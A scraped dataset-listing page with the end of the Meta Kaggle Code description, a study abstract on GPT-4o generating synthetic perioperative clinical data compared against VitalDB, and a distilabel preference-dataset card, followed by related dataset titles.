The files are organized into a two-level directory structure. Each top level folder contains up to 1 million files, e.g. - folder 123 contains all versions from 123,000,000 to 123,999,999. Each sub folder contains up to 1 thousand files, e.g. - 123/456 contains all versions from 123,456,000 to 123,456,999. In practice, each folder will have many fewer than 1 thousand files due to private and interactive sessions.

The ipynb files in this dataset hosted on Kaggle do not contain the output cells. If the outputs are required, the full set of ipynbs with the outputs embedded can be obtained from this public GCS bucket: kaggle-meta-kaggle-code-downloads. Note that this is a "requester pays" bucket. This means you will need a GCP account with billing enabled to download. Learn more here: https://cloud.google.com/storage/docs/requester-pays

Questions / Comments

We love feedback! Let us know in the Discussion tab.

Happy Kaggling!
f
Data Sheet 1_Large language models generating synthetic clinical datasets: a...
figshare.com
frontiersin.figshare.com
xlsx
Updated Feb 5, 2025
+ more versions
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
Austin A. Barr; Joshua Quan; Eddie Guo; Emre Sezgin (2025). Data Sheet 1_Large language models generating synthetic clinical datasets: a feasibility and comparative analysis with real-world perioperative data.xlsx [Dataset]. http://doi.org/10.3389/frai.2025.1533508.s001
Explore at:
xlsxAvailable download formats
Unique identifier
https://doi.org/10.3389/frai.2025.1533508.s001
Dataset updated
Feb 5, 2025
Dataset provided by
Frontiers
Authors
Austin A. Barr; Joshua Quan; Eddie Guo; Emre Sezgin
License
Attribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Description
BackgroundClinical data is instrumental to medical research, machine learning (ML) model development, and advancing surgical care, but access is often constrained by privacy regulations and missing data. Synthetic data offers a promising solution to preserve privacy while enabling broader data access. Recent advances in large language models (LLMs) provide an opportunity to generate synthetic data with reduced reliance on domain expertise, computational resources, and pre-training.ObjectiveThis study aims to assess the feasibility of generating realistic tabular clinical data with OpenAI’s GPT-4o using zero-shot prompting, and evaluate the fidelity of LLM-generated data by comparing its statistical properties to the Vital Signs DataBase (VitalDB), a real-world open-source perioperative dataset.MethodsIn Phase 1, GPT-4o was prompted to generate a dataset with qualitative descriptions of 13 clinical parameters. The resultant data was assessed for general errors, plausibility of outputs, and cross-verification of related parameters. In Phase 2, GPT-4o was prompted to generate a dataset using descriptive statistics of the VitalDB dataset. Fidelity was assessed using two-sample t-tests, two-sample proportion tests, and 95% confidence interval (CI) overlap.ResultsIn Phase 1, GPT-4o generated a complete and structured dataset comprising 6,166 case files. The dataset was plausible in range and correctly calculated body mass index for all case files based on respective heights and weights. Statistical comparison between the LLM-generated datasets and VitalDB revealed that Phase 2 data achieved significant fidelity. Phase 2 data demonstrated statistical similarity in 12/13 (92.31%) parameters, whereby no statistically significant differences were observed in 6/6 (100.0%) categorical/binary and 6/7 (85.71%) continuous parameters. Overlap of 95% CIs were observed in 6/7 (85.71%) continuous parameters.ConclusionZero-shot prompting with GPT-4o can generate realistic tabular synthetic datasets, which can replicate key statistical properties of real-world perioperative data. This study highlights the potential of LLMs as a novel and accessible modality for synthetic data generation, which may address critical barriers in clinical data access and eliminate the need for technical expertise, extensive computational resources, and pre-training. Further research is warranted to enhance fidelity and investigate the use of LLMs to amplify and augment datasets, preserve multivariate relationships, and train robust ML models.

Facebook

Twitter

Click to copy link

Link copied

Cite

distilabel-internal-testing (2024). example-generate-preference-dataset [Dataset]. https://huggingface.co/datasets/distilabel-internal-testing/example-generate-preference-dataset

example-generate-preference-dataset

distilabel-internal-testing/example-generate-preference-dataset

Explore at:

CroissantCroissant is a format for machine-learning datasets. Learn more about this at mlcommons.org/croissant.

Dataset updated

Aug 23, 2024

Dataset authored and provided by

distilabel-internal-testing

Description

Dataset Card for example-preference-dataset

This dataset has been created with distilabel.

  Dataset Summary

This dataset contains a pipeline.yaml which can be used to reproduce the pipeline that generated it in distilabel using the distilabel CLI: distilabel pipeline run --config "https://huggingface.co/datasets/sdiazlor/example-preference-dataset/raw/main/pipeline.yaml"

or explore the configuration: distilabel pipeline info --config… See the full description on the dataset page: https://huggingface.co/datasets/distilabel-internal-testing/example-generate-preference-dataset.

Clear search

Close search

Google apps

Main menu

example-generate-preference-dataset

SQL Injection Attack Netflow

Data used to produce figures and tables

Marketing Enablement Support To Generate Leads

Coresignal | Private Company Data | Company Data | AI-Enriched Datasets |...

Amount of data created, consumed, and stored 2010-2023, with forecasts to...

my-dataset-generate

Construct validity results.

Big data and business analytics revenue worldwide 2015-2022

Maps generator

Features:

Components:

Usage:

Potential Applications:

Data used by EPA researchers to generate illustrative figures for overview...

Envestnet | Yodlee's De-Identified Consumer Purchase Data | Row/Aggregate...

All raw data used to generate results

Simulation results for pairs with counts > 1.

The SPIN covid19 RMRIO dataset: Global trade network data for the years...

Data from: On-farm wildflower plantings generate opposing reproductive...

Data volume of IoT connected devices worldwide 2019 and 2025

Data and code for: Generation and applications of simulated datasets to...

Meta Kaggle Code

Explore our public notebook content!

Why we’re releasing this dataset

Sensitive data

Joining with Meta Kaggle

File organization

Questions / Comments

Data Sheet 1_Large language models generating synthetic clinical datasets: a...

example-generate-preference-datasetSee More Versions

distilabel-internal-testing/example-generate-preference-dataset

example-generate-preference-dataset